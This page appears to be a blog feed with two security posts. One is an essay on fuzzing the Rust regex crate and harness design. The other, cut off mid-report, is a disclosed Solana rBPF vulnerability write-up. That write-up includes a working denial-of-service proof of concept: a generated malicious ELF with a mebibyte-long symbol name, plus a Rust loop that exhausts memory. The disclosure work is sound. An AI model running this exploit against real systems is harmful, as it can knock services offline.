secret club
Ring Around The Regex: Lessons learned from fuzzing regex libraries (Part 1)

By: addison

30 June 2024 at 22:00

Okay, if you’re reading this, you probably know what fuzzing is. As an incredibly reductive summary: fuzzing is an automated, random testing process which tries to explore the state space (e.g., different interpretations of the input or behaviour) of a program under test (PUT; sometimes also SUT, DUT, etc.). Fuzzing is often celebrated as one of the most effective ways to find bugs in programs due to its inherently random nature, which defies human expectation or bias¹. The strategy has found countless security-critical bugs (think tens or hundreds of thousands) over its 30-odd years of existence, and yet faces regular suspicion from industry and academia alike.

The bugs I’m going to talk about in this post are not security critical. The targets and bugs described below are instead offered as a study for fuzzing design decisions and understanding where fuzzing fails. I think this might be useful for people considering fuzz testing in both security and non-security contexts. If anything is poorly explained or incorrect, please reach out and I will happily make corrections, links, or add explanations as necessary.

In this blog post, I’m going to talk about the fuzzing of two very different regular expression libraries. For each, I’ll detail how I went about designing fuzzers for these targets, the usage of the fuzzers against these targets, the analysis and reporting of the bugs, and the maintenance of the fuzzers as automated regression testing tools.

Targets

Okay, our PUTs for today are:

rust-lang/regex
PCRE2

We develop separate differential fuzzing harnesses for each that are dependent on the specific guarantees of each program.

Sidebar: What is regex?

If you have programmed anything dealing with string manipulation, you’ve almost certainly encountered regular expression (RegEx, or just regex) libraries. There are many forms of regular expressions, from the formal definitions to the many modern implementations, like the two discussed here. Modern “flavours” of regex often include quality-of-life features or extended capabilities not described in the original formal definitions, and as such actually represent greater formal constructs (e.g., I’m fairly confident that PCRE2 is capable of encoding something higher than a context-free grammar).

The purpose of these libraries is definitionally straightforward: to provide a language that can define patterns to search through text. Their implementation is rarely so straightforward, for two primary reasons:

Users demand expressive patterns by which to search text. Many different strategies must be made available by these libraries so that users may search and extract details from text effectively.
Text searching is often a hot path in text processing programs. Any regex implementation must process text extremely efficiently for any reasonable pattern.

I won’t give an overview of the writing and usage of regex here, as it’s mostly irrelevant for the rest of this. For those interested, you can find an overview of common features here.

Target 1: rust-lang/regex

The regex crate (hereafter, rust-regex) is one of the most widely used crates in the entire Rust ecosystem. Its syntax is potentially more complex than some other engines due to its extended support of Unicode, but notably restricts itself to regular languages. rust-regex, unlike most other regex libraries, offers moderate complexity guarantees and is thus resistant (to a degree!) to certain malicious inputs.

I fuzzed rust-regex some time ago now (>2 years), but below is a brief summary of how I approached the software.

Analysis of the existing harness

A fuzzing harness (in most cases) is simply a function which accepts an input and runs it in the target. Ultimately, from the perspective of the user, the fuzzing process can be thought of as follows:

1. the fuzzer runtime starts
2. the runtime produces some input
3. the harness is run with the new input; if an input causes a crash, stop
4. the runtime learns something about your program to make better inputs with
5. go to step 2

So, to be super explicit, we describe the fuzzer as the whole program which performs the fuzz testing, the fuzzer runtime as the code (typically not implemented by the user) which generates inputs and analyzes program behaviour, and the harness as the user code which actually manifests the test by calling the PUT. Having a poor fuzzer runtime means your program won’t be tested well. Having a poor harness means that the inputs produced by the runtime might not actually test much of the program, or may not test it very effectively.

Since we don’t want to make a custom fuzzer runtime and just want to test the program, let’s focus on improving the harness.

When I started looking into rust-regex, it was already in OSS-Fuzz. This means potentially thousands of CPU-years of fuzzing has already been performed on the target. Here, we’ll talk about two ways to find new bugs: better inputs and more ways to detect bugs. Both of these are directly affected by how one harnesses the PUT.

Here is the rust-regex harness as I originally saw it. This harness works by interpreting the first byte as a length field, then using that to determine where to split the remainder of the input as the search pattern and the “haystack” (text to be searched).

index                                      | meaning
------------------------------------------------------------
0                                          | length field
------------------------------------------------------------
[1, 1 + data[0] % (len(data) - 1))         | search pattern
------------------------------------------------------------
[1 + data[0] % (len(data) - 1), len(data)) | haystack

And, this works; for several years, this fuzzer was used in practice and found several bugs. But this harness has some problems, the biggest of which being: data reinterpretation over mutation.

Looking under the hood

Fuzzers, sadly, are not magic bug printers. The fuzzer runtime used here is libFuzzer, which performs random byte mutations and has no fundamental understanding of the program under test. In fact, the only thing the fuzzer really considers to distinguish the effects of different inputs is the coverage of the program². When an input is generated, it is only considered interesting (and therefore retained) if the program exhibits new coverage.

Moreover, inputs are not simply generated by libFuzzer. They are rather the result of mutation: the process of modifying an existing input to get a new input. Let’s break apart the loop we described earlier into finer steps:

1. the fuzzer runtime starts
2. the runtime selects some existing input from the corpus (the retained set of inputs); if none are available, generate one and go to step 4
3. the runtime mutates the input
4. the harness is run with the new input; if an input causes a crash, stop
5. the runtime inspects the coverage of the last run; if the input caused a new code region to be explored, add it to the corpus
6. go to step 2

Understanding mutation

One of the underlying assumptions made about fuzzing with mutation is that a mutated input is similar to the input it’s based on, but different in interesting ways. But, what does it mean to be similar? What does it mean to be interestingly different?

In general, we would like to explore the PUT’s various ways of interpreting an input. We can’t³ magically generate inputs that get to places we haven’t explored before. Rather, we need to stepwise explore the program by slowly stepping across it.

Consider a classic demonstration program in fuzzing (pseudocode):

if (len(data) >= 1 && data[0] == 'a') {
 if (len(data) >= 2 && data[1] == 'b') {
  if (len(data) >= 3 && data[2] == 'c') {
   if (len(data) >= 4 && data[3] == 'd') {
    // bug!
   }
  }
 }
}

Suppose we want to hit the line that says “bug!”. We need to provide the program with an input that starts with abcd. If we simply generate random strings, the odds of producing such a string are at most 1 in 2^32 – roughly 1 in 4 billion. Not the best odds.

The promise of coverage-guided fuzzing is that, by mutation, we slowly explore the program and thus break down the problem into separate, easier to generate subproblems. Suppose that our runtime only applies mutations that randomly produce inputs with an edit distance of 1. Now, when we mutate our inputs, starting small, we can guess the bytes one at a time, each with odds of 1 in 256, and our runtime will progressively explore the program and get to the line that says “bug!” after solving this sequence of smaller subproblems.
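To make the loop above concrete, here is a minimal sketch of a coverage-guided fuzzer for the nested-check program. It is not libFuzzer: the names (`target`, `Lcg`, `fuzz`), the tiny random number generator, and the use of "deepest check reached" as a stand-in for coverage are all assumptions made for illustration. Each mutation appends or overwrites a single byte, so the edit distance is 1.

```rust
/// The nested-check target: returns how many checks passed (4 means "bug!").
fn target(data: &[u8]) -> usize {
    data.iter().zip(b"abcd").take_while(|(got, want)| got == want).count()
}

/// Tiny linear congruential generator so the sketch needs no external crates.
struct Lcg(u64);

impl Lcg {
    fn next(&mut self) -> u32 {
        self.0 = self
            .0
            .wrapping_mul(6364136223846793005)
            .wrapping_add(1442695040888963407);
        (self.0 >> 33) as u32
    }
}

/// Runs the select/mutate/execute/retain loop.
/// Returns the input that reached "bug!" and the number of executions used.
fn fuzz(seed: u64, max_execs: u64) -> Option<(Vec<u8>, u64)> {
    let mut rng = Lcg(seed);
    let mut corpus: Vec<Vec<u8>> = vec![Vec::new()]; // start from the empty input
    let mut best = 0; // deepest check reached so far (our "coverage")
    for execs in 1..=max_execs {
        // Select an existing input and apply one edit-distance-1 mutation.
        let mut input = corpus[rng.next() as usize % corpus.len()].clone();
        if input.is_empty() || rng.next() % 2 == 0 {
            input.push(rng.next() as u8); // append a random byte
        } else {
            let at = rng.next() as usize % input.len();
            input[at] = rng.next() as u8; // overwrite a random byte
        }
        let depth = target(&input);
        if depth == 4 {
            return Some((input, execs)); // "crash": stop
        }
        if depth > best {
            best = depth;
            corpus.push(input); // new coverage: retain the input
        }
    }
    None
}

fn main() {
    match fuzz(0x5eed, 1_000_000) {
        Some((input, execs)) => println!(
            "reached bug! with {:?} after {} executions",
            String::from_utf8_lossy(&input),
            execs
        ),
        None => println!("budget exhausted"),
    }
}
```

Because every retained input is one correct byte closer to the goal, each stage only needs a single lucky byte, which is why the budget here is tiny compared with the roughly 4 billion attempts that blind generation would need on average.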

The data reinterpretation problem

Let’s rewrite our harness slightly to be more representative of the rust-regex harness.

if (len(input) <= 1) {
 return;
}
data = input[1..];
offset = input[0] % len(data);
if (len(data) - offset >= 1 && data[offset] == 'a') {
 if (len(data) - offset >= 2 && data[offset + 1] == 'b') {
  if (len(data) - offset >= 3 && data[offset + 2] == 'c') {
   if (len(data) - offset >= 4 && data[offset + 3] == 'd') {
    // bug!
   }
  }
 }
}

This program is precisely the same “difficulty” as the original problem; we set input[0] = 0 and input[1..] to the solution from the original harness. Except, for coverage-guided fuzzers, this problem is orders of magnitude more difficult (reader encouraged to try!). Let’s look at how this program behaves over mutation; for clarity, raw bytes (like the offset field) will be written as [x] with x as the value in that byte.

Starting with some randomly generated input:

[123]c
  ^  ^
  |  |
  |  + first byte
  |
  + offset field; offset = 123 % len(input[1..]) = 123 % 1 = 0

This input is retained, because we have new coverage over the first few lines, but we don’t make it into the nested ifs just yet. Then, we mutate it until we find new coverage:

[123]a
  ^  ^
  |  |
  |  + first byte (passes our check!)
  |
  + offset field; offset = 123 % len(input[1..]) = 123 % 1 = 0

Great! We’ve hit the first if in the nested block. Unfortunately, with an edit distance of 1, we can now never trigger the bug. Suppose we get lucky and produce a b, which would previously have passed the second condition:

[123]ab
  ^  ^^
  |  ||
  |  |+ first byte (fails the first check)
  |  |
  |  + skipped by offset
  |
  + offset field; offset = 123 % len(input[1..]) = 123 % 2 = 1

Because the offset is now reinterpreted by the program due to a change in length, the input is actually dissimilar to the original input from the perspective of the program. Even supposing we get lucky and get an a instead, the coverage of the resulting program doesn’t improve over the first mutated input and thus doesn’t get retained. If we change the offset to zero, then we don’t get new coverage because we still only have an a. With an edit distance of 1, we simply cannot actually produce any new coverage from this input.
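The walkthrough above can be checked with a small Rust rendition of the offset harness. This is a sketch of the pseudocode only, not the rust-regex harness; the function name `depth` and its return value (the number of nested checks passed) are assumptions for illustration.

```rust
/// Mirrors the pseudocode harness: the first byte picks where matching starts.
/// Returns how many nested checks passed (4 means "bug!").
fn depth(input: &[u8]) -> usize {
    if input.len() <= 1 {
        return 0;
    }
    let data = &input[1..];
    let offset = input[0] as usize % data.len();
    // Compare the bytes from `offset` onwards against "abcd", stopping at the first mismatch.
    data[offset..]
        .iter()
        .zip(b"abcd")
        .take_while(|(got, want)| got == want)
        .count()
}

fn main() {
    let cases: [&[u8]; 5] = [
        &[123, b'c'],       // random start
        &[123, b'a'],       // passes the first check
        &[123, b'a', b'b'], // appending 'b' moves the offset to 1
        &[123, b'a', b'a'], // appending 'a' gives no new coverage
        &[0, b'a', b'b'],   // only a simultaneous offset change helps
    ];
    for input in cases.iter() {
        println!("{:?} -> depth {}", input, depth(input));
    }
}
```

The last case shows what a single-byte mutation cannot do: reaching the second check from `[123]a` requires changing the offset byte and appending `b` at the same time.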

This data reinterpretation problem is rampant across OSS-Fuzz harnesses, and mitigating the problems induced by this is a great place to start for people looking to improve existing harnesses. While, in practice, the edit distance of mutations is extremely large, the randomness produced by reinterpretation effectively reduces us all the way back to random generation (since we are nearly guaranteed to induce a reinterpretation by havoc mutations used by nearly all fuzzers). In rust-regex, the consequence of this reinterpretation problem is that regexes are wildly reinterpreted when inputs are small (as typically optimised-for by fuzzers) or when the first byte is mutated. Moreover, the pattern can never actually exceed 255 bytes (!).
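As a sketch of the input layout from the table earlier (not the actual harness source), the split can be written as a small Rust function. The name `split` and the handling of inputs shorter than two bytes are assumptions.

```rust
/// Splits fuzzer input following the table: byte 0 is a length field,
/// followed by the search pattern, followed by the haystack.
fn split(data: &[u8]) -> Option<(&[u8], &[u8])> {
    if data.len() < 2 {
        return None; // need the length field plus at least one more byte
    }
    let cut = 1 + data[0] as usize % (data.len() - 1);
    Some((&data[1..cut], &data[cut..]))
}

fn main() {
    // Appending a single byte moves the boundary between pattern and haystack.
    println!("{:?}", split(b"\x05abc"));
    println!("{:?}", split(b"\x05abcd"));

    // The length field is one byte, so the pattern is capped at 255 bytes.
    let mut big = vec![b'x'; 1001];
    big[0] = 255;
    let (pattern, haystack) = split(&big).unwrap();
    println!("pattern: {} bytes, haystack: {} bytes", pattern.len(), haystack.len());
}
```

With the length byte fixed at 5, the four-byte input yields the pattern `ab`, while the five-byte input yields the pattern `a`: the same leading bytes are interpreted as a different regex after a one-byte append.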

Redesigning the harness

Okay, so we know that the existing harness has some problems. Let’s redesign the harness to clearly segment between “pattern” and “haystack” by structurally defining the input. We can use the handy dandy arbitrary crate to define a parser over arbitrary bytes to transform the input into a well-formed pattern and haystack. In effect, arbitrary acts as an interpreter for the bits in the input, so each mutation changes the decisions made by that parser⁴. As a user, this is simple, straightforward, and makes inputs much more “meaningful”; we now know that the bytes in our input represent a meaningful pattern.

You can find these changes in the merged changes by the author; change 1, change 2.

Did we solve the reinterpretation problem?

Interlude: grammar fuzzing vs byte fuzzing

Consider, for a second, a JSON parser. JSON is a very well-defined, structural language that aggressively rejects malformed inputs. Yet, byte-level mutational fuzzers with no awareness of the JSON format can produce well-formed JSON inputs by exploring the program space. That said, most mutations produced mangle the JSON input dramatically (e.g., in {"hello":"world"}, a mutation to {"hel"o":"world"} instantly makes the JSON parser reject the input). This limits the ability for byte-level mutational fuzzers to produce interesting inputs that test code behind a JSON interpreter.

Consider the following rendition of our earlier examples:

obj = JSON.loads(input); // lots of coverage in JSON to explore!

if (obj.a == 'a') {
  // bug!
}

Our byte-level mutational fuzzer will try to find as much code coverage as it can – and will mostly get lost in the weeds in the JSON step. Suppose we are “smart” and tell the fuzzer to magically ignore the coverage in JSON; now, the fuzzer will almost certainly never produce even a valid JSON input. As a result, we will never hit “bug!”.

But, suppose we wrote an arbitrary implementation that was capable of interpreting the random bytes produced by our mutational fuzzer as valid objects with a field called “a”, before serialising them and handing them to the PUT. Now, we are effectively guaranteed to be able to produce an input that hits “bug!”, provided that our mutator is smart enough to figure out how to get the string “a” into that field.

Certainly, the mutator will easily do this, right?

Data Reinterpretation: Reloaded

Arbitrary, sadly, is not a magic input printer.

Internally, the parser itself defines various length fields throughout the parsing process which determine how the remainder of an input is processed. This makes the format of the input change dramatically with small changes to the input⁵, and thus, once again, the data reinterpretation problem emerges.
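A toy model may help here. The sketch below is not the arbitrary crate's API and not the rust-regex fuzzer; `Source`, `Ast`, `decode`, `render`, and `pattern_from` are hypothetical names for a hand-rolled decoder that, like an arbitrary-style parser, turns any byte string into a well-formed pattern by letting bytes drive choices and embedded counts.

```rust
/// Hypothetical byte reader; exhausted input reads as zero.
struct Source<'a> {
    data: &'a [u8],
    pos: usize,
}

impl<'a> Source<'a> {
    fn next(&mut self) -> u8 {
        let byte = self.data.get(self.pos).copied().unwrap_or(0);
        self.pos += 1;
        byte
    }
}

/// A deliberately tiny regex syntax tree.
enum Ast {
    Literal(char),
    Any,
    Concat(Vec<Ast>),
    Alternate(Box<Ast>, Box<Ast>),
    Star(Box<Ast>),
}

/// Every byte string decodes to some well-formed tree; `depth` bounds recursion.
fn decode(src: &mut Source, depth: u32) -> Ast {
    // At depth 0 only leaf nodes are allowed.
    let choice = if depth == 0 { src.next() % 2 } else { src.next() % 5 };
    match choice {
        0 => Ast::Literal((b'a' + src.next() % 26) as char),
        1 => Ast::Any,
        2 => {
            let count = 1 + src.next() % 3; // an embedded length field
            Ast::Concat((0..count).map(|_| decode(src, depth - 1)).collect())
        }
        3 => {
            let left = decode(src, depth - 1);
            let right = decode(src, depth - 1);
            Ast::Alternate(Box::new(left), Box::new(right))
        }
        _ => Ast::Star(Box::new(decode(src, depth - 1))),
    }
}

/// Serialises the tree back into pattern syntax.
fn render(ast: &Ast) -> String {
    match ast {
        Ast::Literal(c) => c.to_string(),
        Ast::Any => ".".to_string(),
        Ast::Concat(items) => items.iter().map(render).collect(),
        Ast::Alternate(l, r) => format!("(?:{}|{})", render(l), render(r)),
        Ast::Star(inner) => format!("(?:{})*", render(inner)),
    }
}

fn pattern_from(bytes: &[u8]) -> String {
    render(&decode(&mut Source { data: bytes, pos: 0 }, 2))
}

fn main() {
    println!("{}", pattern_from(&[3, 0, 0, 4, 1])); // (?:a|(?:.)*)
    println!("{}", pattern_from(&[2, 0, 0, 4, 1])); // e
}
```

Both inputs decode to valid patterns, but changing only the first byte from 3 to 2 turns an alternation into a single literal, because every later byte is now consumed by a different decision.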

Worse, when we now deploy our fuzzer, the meaning of the inputs changes – so our thousands of CPU years of fuzzing in the past is now thrown away.

As it turns out, the data reinterpretation problem is probably unavoidable; without having mutations that are simply aware of the datatype, producing similar inputs is probably not possible. Even when directly mutating entries in the grammar (e.g., by simply replacing one subtree of the input with another), the edit distance is often huge. This invalidates the basic premise of our coverage-guided fuzzer, and as a result makes our fuzzer effectively useless.

Right?

Results

My arbitrary-based fuzzer was written in 30 minutes. I ran it for less than a minute before a testcase triggered CVE-2022-24713⁶ as a timeout in a release build of the fuzzer.

As it turns out, the mass reinterpretations of the input were not a problem, at least when arbitrary was used. Since the randomness induced by the mutations caused major reinterpretations of the input, a huge amount of the grammar of the inputs was explored. This effectively turned the mutator into a blackbox grammar generator, and the grammar was covered as a natural result of the covering of the program.

With the randomness constrained to valid inputs, it was only a matter of time before a valid input was spat out that met the exact preconditions for the bug. And since then, it has found lots of other issues, too. I’ve even made differential fuzzers which have had success in identifying some consistency bugs between versions and sub-implementations.

So, we’ve found all the bugs now, right?

Takeaways

I recognise that this section is, frankly, a bit hard to interpret. We started out by saying that maintaining the similarity of inputs was important for coverage-based fuzzers, then ended by saying, “oh, it actually wasn’t if we were using arbitrary”. So, what is it?

The sad answer is simply that our testing is incomplete – and will always be incomplete. While we are now capable of producing well-formed, highly-complex, and interesting inputs quickly, we lack guidance when actually performing mutations. Our inputs are very dissimilar across mutations, and we likely suffer from the JSON loading problem I described earlier, where we can’t find the deeper bugs dependent on the result of the parsing.

It’s unclear whether we effectively test different matching strategies, too. While our inputs are now grand and complex, they may not be effectively testing the matching code since we don’t know how relevant our haystacks are to our patterns. The fuzzer has, resultantly, missed several crashes and incorrectnesses discovered by other users.

Finally, since the differential fuzzers are not actively in use, we rely entirely on assertions and crashes. In other words, we cannot find correctness issues at all. Even if differential fuzzers were enabled, there is no guarantee that they would catch all the issues, especially since we don’t explore the program space very well for matching.

I could ramble on for some time about other weaknesses of the fuzzers now in use here, but that’s neither here nor there. The main thing that you, dear reader, should consider is how your fuzzer is internally trying to test the program and how much time you’re willing to spend to make the fuzzer work well. The fuzzer runtime is not magic and neither is the harness. You cannot expect it to reliably produce inputs that, as passed by your harness, will trigger bugs in your program. Moreover, you cannot expect that you will magically find bugs which you have no means of detecting. You must critically think about how inputs will be generated, mutated, interpreted, and executed, and decide how much time you will spend to make the fuzzer effective for finding bugs in your target.

But almost certainly, byte-level mutations are not enough.

Target 2: PCRE2

Continued in Part 2, to be released 2024.07.15.

¹ Mostly. Fuzzers can be overfit to certain applications, intentionally or not.
² This is not strictly accurate. libFuzzer collects lots of different types of information, but at its core is ultimately a coverage-guided fuzzer.
³ Actually we kind of can, with symbolic execution, but this has its own problems that I’m not going into here.
⁴ This was recently described to me in Caroline Lemieux’s keynote at SBFT’24, but for my life I cannot remember the citation, cannot find it in the recording, and cannot find it in Google easily.
⁵ This isn’t actually commonly discussed as a problem of arbitrary. You can see this effect in several places.
⁶ I originally believed that this was a violation of the complexity guarantees of rust-regex, though their complexity guarantees refer to the size of the pattern after it is compiled, or made ready for use. Instead, the issue was in the rust-regex compiler, which effectively translates a human-readable pattern to an intermediate representation which is then “executed” to perform the actual search operation. This representation has all repetitions expanded, meaning that the issue affects compilation, before the guarantees apply. The original implementation presumed that the memory growth of the intermediate representation represented the computational cost of the pattern compilation, whereas the testcase that was discovered had zero-sized items with many repetitions. This led to a large compilation time before the pattern could even be used.

secret club
Earn $200K by fuzzing for a weekend: Part 2

By: addison

11 May 2022 at 08:00

Below are the writeups for two vulnerabilities I discovered in Solana rBPF, a self-described “Rust virtual machine and JIT compiler for eBPF programs”. These vulnerabilities were responsibly disclosed according to Solana’s Security Policy and I have permission from the engineers and from the Solana Head of Business Development to publish these vulnerabilities as shown below.

In part 1, I discussed the development of the fuzzers. Here, I will discuss the vulnerabilities as I discovered them and the process of reporting them to Solana.

Bug 1: Resource exhaustion

The first bug I reported to Solana was exceptionally tricky; it only occurs in highly specific circumstances, and the fact that the fuzzer discovered it at all is a testament to the incredible complexity of inputs a fuzzer can discover through repeated trials. The relevant crash was found within approximately two hours of starting the fuzzer.

Initial Investigation

The input that triggered the crash disassembles to the following assembly:

entrypoint:
  r0 = r0 + 255
  if r0 <= 8355838 goto -2
  r9 = r3 >> 3
  call -1

For whatever reason, this particular set of instructions causes a memory leak.

When executed, this program does the following steps, roughly:

increase r0 (which starts at 0) by 255
jump back to the previous instruction if r0 is less than or equal to 8355838
- this, in tandem with the first step, will cause the loop to execute 32767 times (a total of 65534 instructions)
set r9 to r3 >> 3 (that is, r3 / 2^3), which is going to be zero because r3 starts at zero
calls a nonexistent function
- the nonexistent function should trigger an unknown symbol error

What stood out to me about this particular test case is how incredibly specific it was; varying the addition of 255 or 8355838 by even a small amount caused the leak to disappear. It was then I remembered the following line from my fuzzer:

let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };

remaining, here, refers to the number of instructions remaining before the program is forcibly terminated. As a result, the leaking program was exhausting this meter at exactly the call instruction.

A faulty optimisation

There is a wall of text at line 420 of jit.rs which suitably describes an optimisation that Solana applied in order to reduce the frequency at which they need to update the instruction meter.

The short version is that they only update or check the instruction meter when they reach the end of a block or a call, in order to reduce the number of times they update and check the meter. This optimisation is totally reasonable; we don’t care if we run out of instructions in the middle of a block because the subsequent instructions are still “safe”, and if we ever hit an exit that’s the end of a block anyway. In other words, this optimisation should have no effect on the final state of the program.
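As a rough model of this optimisation (not the code in jit.rs), the sketch below compares metering at block ends with metering before every instruction. The function names, the representation of a program as a list of block sizes, and the exact "exceeded" threshold are simplifying assumptions.

```rust
/// Counts instructions one block at a time and checks the budget only at block ends.
/// Returns (instructions executed, whether the budget was exceeded).
fn run_block_metered(block_sizes: &[u64], budget: u64) -> (u64, bool) {
    let mut executed = 0;
    for &size in block_sizes {
        executed += size; // the whole block runs before the meter is consulted
        if executed > budget {
            return (executed, true);
        }
    }
    (executed, false)
}

/// Reference behaviour: the budget is enforced before every instruction.
fn run_instruction_metered(block_sizes: &[u64], budget: u64) -> (u64, bool) {
    let total: u64 = block_sizes.iter().sum();
    if total > budget {
        (budget, true)
    } else {
        (total, false)
    }
}

fn main() {
    // A one-instruction block followed by a two-instruction block, with a budget of 2.
    let blocks = [1, 2];
    println!("block-level:       {:?}", run_block_metered(&blocks, 2));
    println!("instruction-level: {:?}", run_instruction_metered(&blocks, 2));
}
```

Both variants report that the budget was exceeded, but the block-level meter lets a third instruction run first. That is harmless when the extra instructions have no lasting side effects, and it is exactly the assumption that a trailing instruction with side effects would break.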

The issue can be seen in the patch for the vulnerability, where the maintainer moved line 1279 to line 1275. To understand why that’s relevant, let’s walk through our execution again:

increase r0 (which starts at 0) by 255
jump back to the previous instruction if r0 is less than or equal to 8355838
- this, in tandem with the first step, will cause the loop to execute 32767 times (a total of 65534 instructions)
- our meter updates here
set r9 to r3 >> 3 (that is, r3 / 2^3), which is going to be zero because r3 starts at zero
calls a nonexistent function
- the nonexistent function should trigger an unknown symbol error, but that doesn’t happen because our meter updates here and emits a max instructions exceeded error

However, based on the original order of the instructions, what happens in the call is the following:

invoke the call, which fails because the symbol is unresolved
to report the unresolved symbol, we invoke the report_unresolved_symbol function, which returns the name of the symbol invoked (or “Unknown”) in a heap-allocated string
the pc is updated
the instruction count is validated, which overwrites the unresolved symbol error and terminates execution

Because the unresolved symbol error is merely overwritten, the value is never passed to the Rust code which invoked the JIT program. As a result, the reference to the heap-allocated String is lost and the String is never dropped. With no remaining pointer to it, that heap allocation can never be freed, which is the leak.
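The difference between an ordinary Rust assignment and a raw overwrite can be shown in isolation. The sketch below is not rBPF code: `UnresolvedSymbol`, `VmError`, and `overwrite_error` are stand-ins, and `ptr::write` is used as an approximation of what JIT-emitted machine code does when it stores a new result over an old one without running any destructor.

```rust
use std::cell::Cell;
use std::ptr;
use std::rc::Rc;

/// Stand-in for the unresolved-symbol error, which owns a heap-allocated name.
#[allow(dead_code)]
struct UnresolvedSymbol {
    name: String,
    drops: Rc<Cell<usize>>, // counts how often the destructor runs
}

impl Drop for UnresolvedSymbol {
    fn drop(&mut self) {
        self.drops.set(self.drops.get() + 1);
    }
}

#[allow(dead_code)]
enum VmError {
    UnresolvedSymbol(UnresolvedSymbol),
    ExceededMaxInstructions,
}

/// Overwrites a result slot holding an unresolved-symbol error and reports
/// how many times that error's destructor ran.
fn overwrite_error(raw_store: bool) -> usize {
    let drops = Rc::new(Cell::new(0));
    let mut slot: Result<u64, VmError> = Err(VmError::UnresolvedSymbol(UnresolvedSymbol {
        name: "Unknown".to_string(),
        drops: Rc::clone(&drops),
    }));
    if raw_store {
        // Store the new value without dropping the old one: the String leaks.
        unsafe { ptr::write(&mut slot, Err(VmError::ExceededMaxInstructions)) };
    } else {
        // Ordinary assignment drops the old value first.
        slot = Err(VmError::ExceededMaxInstructions);
    }
    drop(slot);
    drops.get()
}

fn main() {
    println!("assignment: destructor ran {} time(s)", overwrite_error(false));
    println!("raw store:  destructor ran {} time(s)", overwrite_error(true));
}
```

In the raw-store case the destructor never runs, so the seven bytes backing "Unknown" stay allocated with nothing left pointing at them.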

That being said, the leak is only seven bytes per execution of the program. Without causing a larger leak, this isn’t particularly exploitable.

Weaponisation

Let’s take a closer look at report_unresolved_symbol.

report_unresolved_symbol source

pub fn report_unresolved_symbol(&self, insn_offset: usize) -> Result<u64, EbpfError<E>> {
    let file_offset = insn_offset
        .saturating_mul(ebpf::INSN_SIZE)
        .saturating_add(self.text_section_info.offset_range.start as usize);

    let mut name = "Unknown";
    if let Ok(elf) = Elf::parse(self.elf_bytes.as_slice()) {
        for relocation in &elf.dynrels {
            match BpfRelocationType::from_x86_relocation_type(relocation.r_type) {
                Some(BpfRelocationType::R_Bpf_64_32) | Some(BpfRelocationType::R_Bpf_64_64) => {
                    if relocation.r_offset as usize == file_offset {
                        let sym = elf
                            .dynsyms
                            .get(relocation.r_sym)
                            .ok_or(ElfError::UnknownSymbol(relocation.r_sym))?;
                        name = elf
                            .dynstrtab
                            .get_at(sym.st_name)
                            .ok_or(ElfError::UnknownSymbol(sym.st_name))?;
                    }
                }
                _ => (),
            }
        }
    }
    Err(ElfError::UnresolvedSymbol(
        name.to_string(),
        file_offset
            .checked_div(ebpf::INSN_SIZE)
            .and_then(|offset| offset.checked_add(ebpf::ELF_INSN_DUMP_OFFSET))
            .unwrap_or(ebpf::ELF_INSN_DUMP_OFFSET),
        file_offset,
    )
    .into())
}

Note how the name is the string which becomes heap allocated. The value of the name is determined by a relocation lookup in the ELF, which we can actually control if we compile our own malicious ELF. Even though the fuzzer only tests the JIT operations, one of the intended ways to load a BPF program is as an ELF, so it seems like something that would certainly be in scope.

Crafting the malicious ELF

To create an unresolved relocation in BPF, it’s actually quite simple. We just need to create a function with a very, very long name that isn’t actually defined, only declared. To do so, I created two files to craft the malicious ELF:

evil.h

evil.h is far too large to post here, as it has a function name that is approximately a mebibyte long. Instead, it was generated with the following bash command.

$ echo "#define EVIL do_evil_$(printf 'a%.0s' {1..1048576})

void EVIL();
" > evil.h

evil.c

#include "evil.h"

void entrypoint() {
  asm("	goto +0\n"
      "	r0 = 0\n");
  EVIL();
}

Note that goto +0 is used here because we’ll use a specialised instruction meter that can only execute two instructions.

Finally, we’ll also make a Rust program to load and execute this ELF just to make sure the maintainers are able to replicate the issue.

elf-memleak.rs

You won’t be able to use this particular example anymore as rBPF has changed a lot of its API since the time this was created. However, you can check out version v0.22.21, which this exploit was crafted for.

Note in particular the use of an instruction meter with two remaining.

use std::collections::BTreeMap;
use std::fs::File;
use std::io::Read;

use solana_rbpf::{elf::{Executable, register_bpf_function}, insn_builder::IntoBytes, vm::{Config, EbpfVm, TestInstructionMeter, SyscallRegistry}, user_error::UserError};
use solana_rbpf::insn_builder::{Arch, BpfCode, Cond, Instruction, MemSize, Source};

use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::verifier::check;

fn main() {
    let mut file = File::open("tests/elfs/evil.so").unwrap();
    let mut elf = Vec::new();
    file.read_to_end(&mut elf).unwrap();
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut syscall_registry = SyscallRegistry::default();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscall_registry).unwrap();
    if Executable::jit_compile(&mut executable).is_ok() {
        for _ in 0.. {
            let mut jit_mem = [0; 65536];
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 2 };
            jit_vm.execute_program_jit(&mut jit_meter).ok();
        }
    }
}

With our malicious ELF that has a function name that’s a mebibyte long, the report_unresolved_symbol will set that name variable to the long function name. As a result, the allocated string will leak a whole mebibyte of memory per execution rather than the measly seven bytes. When performed in this loop, the entire system’s memory will be exhausted in mere moments.

Reporting

Okay, so now that we’ve crafted the exploit, we should probably report it to the vendor.

A quick Google later and we find the Solana security policy. Scrolling through, it says:

DO NOT CREATE AN ISSUE to report a security problem. Instead, please send an email to [email protected] and provide your github username so we can add you to a new draft security advisory for further discussion.

Okay, reasonable enough. Looks like they have bug bounties too!

DoS Attacks: $100,000 USD in locked SOL tokens (locked for 12 months)

Woah. I was working on rBPF out of curiosity, but it seems that there’s quite a bounty made available here.

I sent in my bug report via email on January 31st, and, within just three hours, Solana acknowledged the bug. Below is the report as submitted to Solana:

Report for bug 1 as submitted to Solana

There is a resource exhaustion vulnerability in solana_rbpf (specifically in src/jit.rs) which affects JIT-compiled eBPF programs (both ELF and insn_builder programs). An adversary with the ability to load and execute eBPF programs may be able to exhaust memory resources for the program executing solana_rbpf JIT-compiled programs.

